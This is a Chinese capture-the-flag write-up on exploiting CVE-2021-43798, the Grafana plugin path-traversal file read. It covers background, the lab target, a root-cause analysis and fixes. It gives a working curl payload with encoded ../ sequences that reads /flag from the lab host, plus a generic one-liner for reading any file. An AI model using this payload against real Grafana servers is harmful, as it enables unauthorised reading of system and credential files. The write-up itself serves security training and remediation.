网络安全靶场WP:Grafana 任意文件读取漏洞(CVE-2021-43798)

网络安全靶场WP:Grafana 任意文件读取漏洞(CVE-2021-43798)

平台 :玄机靶场(https://xj.edisec.net/challenges/413)
题目类型 :渗透 / 简单
积分 :300 分
完成状态 :✅ 已完成(第 6 名)
Flagflag{1cd4a829-296d-45b2-abf6-c4313020985c}


一、漏洞背景

CVE-2021-43798 是 Grafana 8.0.0-beta1 至 8.3.0 版本中存在的一个任意文件读取漏洞。2021 年 12 月,推特用户 @j0v 公开披露该 0day 漏洞。

漏洞成因:Grafana 的插件静态文件服务接口 /public/plugins/<plugin_name>/ 在处理文件路径时,未对 URL 编码的路径穿越序列(%2e%2e%2f)进行正确规范化,导致攻击者可以读取服务器上的任意文件,且无需任何认证


二、漏洞信息

属性 内容
CVE 编号 CVE-2021-43798
影响版本 Grafana 8.0.0-beta1 ~ 8.3.0
漏洞类型 路径穿越(Path Traversal)/ 任意文件读取
认证要求 无需认证
CVSS 评分 7.5(High)
漏洞端点 GET /public/plugins/<plugin_name>/<traversal_path>

三、靶机信息

属性 内容
靶机 IP 161.189.114.245
服务端口 3000(Grafana Web UI)
目标文件 /flag
靶机倒计时 30 分钟

四、漏洞利用过程

步骤 1:确认服务可达

bash 复制代码
curl -s -o /dev/null -w "%{http_code}" http://161.189.114.245:3000/
# 返回 302,重定向到 /login,确认 Grafana 服务正常运行

步骤 2:构造路径穿越 Payload

CVE-2021-43798 的关键在于使用 URL 编码的点斜杠%2e%2e%2f)绕过 Grafana 的路径规范化检查:

  • 普通 ../ 会被 Grafana 的路由层规范化,返回 302 重定向到登录页
  • %2e%2e%2f(即 ../ 的 URL 编码)绕过了路由层检查,直接到达文件服务层

步骤 3:发送利用请求

bash 复制代码
curl -s --path-as-is \
  "http://161.189.114.245:3000/public/plugins/alertlist/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag"

响应内容

复制代码
flag{1cd4a829-296d-45b2-abf6-c4313020985c}

注意--path-as-is 参数防止 curl 自动规范化 URL 中的 %2e%2e 序列,确保 payload 原样发送到服务器。

步骤 4:提交 Flag

在平台步骤 #1 的 Flag 提交框中输入 flag{1cd4a829-296d-45b2-abf6-c4313020985c},提交成功,题目状态变为"已完成"。


五、漏洞原理深入分析

Grafana 的插件静态文件服务代码在处理请求路径时,存在两层检查:

  1. 路由层 (Go 的 net/http 路由):会对 ../ 进行规范化,防止路径穿越
  2. 文件服务层http.ServeFile):接收到路径后直接读取文件

当使用 %2e%2e%2f 时,路由层不识别为路径穿越(因为它是 URL 编码形式),直接将请求传递给文件服务层。文件服务层在解码 URL 后,路径变为 ../../../../../../../flag,从而读取到根目录下的 /flag 文件。


六、修复建议

修复方案 说明
升级版本 升级到 Grafana 8.3.1 或更高版本
路径规范化 在文件服务层对 URL 解码后的路径进行规范化检查
访问控制 限制 /public/plugins/ 接口只能访问插件目录内的文件
网络隔离 将 Grafana 部署在内网,不直接暴露到公网

七、关键命令

bash 复制代码
# 一行命令读取任意文件
curl -s --path-as-is \
  "http://TARGET:3000/public/plugins/alertlist/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fFILE_PATH"

相关推荐
chushiyunen1 小时前
langchain4j笔记、tools
笔记·python·flask
影视飓风TIM3 小时前
数据结构 | 链表超全笔记(单链表+双链表+高频算法题)
数据结构·笔记·链表
二哈赛车手3 小时前
新人笔记---最终版智能体图片分析完整方案,包括一些总结于经验,以及各种优化点讲解
java·笔记·spring·ai·springboot
_李小白3 小时前
【智能驾驶:视觉感知后处理 阅读笔记】Day4: 相机成像模型与畸变
笔记·数码相机
zyplayer-doc3 小时前
企业知识库安全与权限管理完全指南:从加密到审计的六层防护
人工智能·安全·pdf·编辑器·创业创新
十月的皮皮3 小时前
C语言学习笔记20260615-有序升序序列合并
c语言·笔记·学习
小小小花儿4 小时前
SSH密钥配置(免密连接远程服务器)
服务器·ssh
天天讯通5 小时前
OKCC 呼叫中心安全性能全解析:技术防护与管理措施指南
大数据·开发语言·网络·人工智能·安全·语音识别
志栋智能5 小时前
超自动化运维如何提升安全合规水平?
运维·安全·自动化
IT新视界6 小时前
星环科技ArgoDB:基于一体化架构构建数据全生命周期安全底座
数据库·科技·安全·架构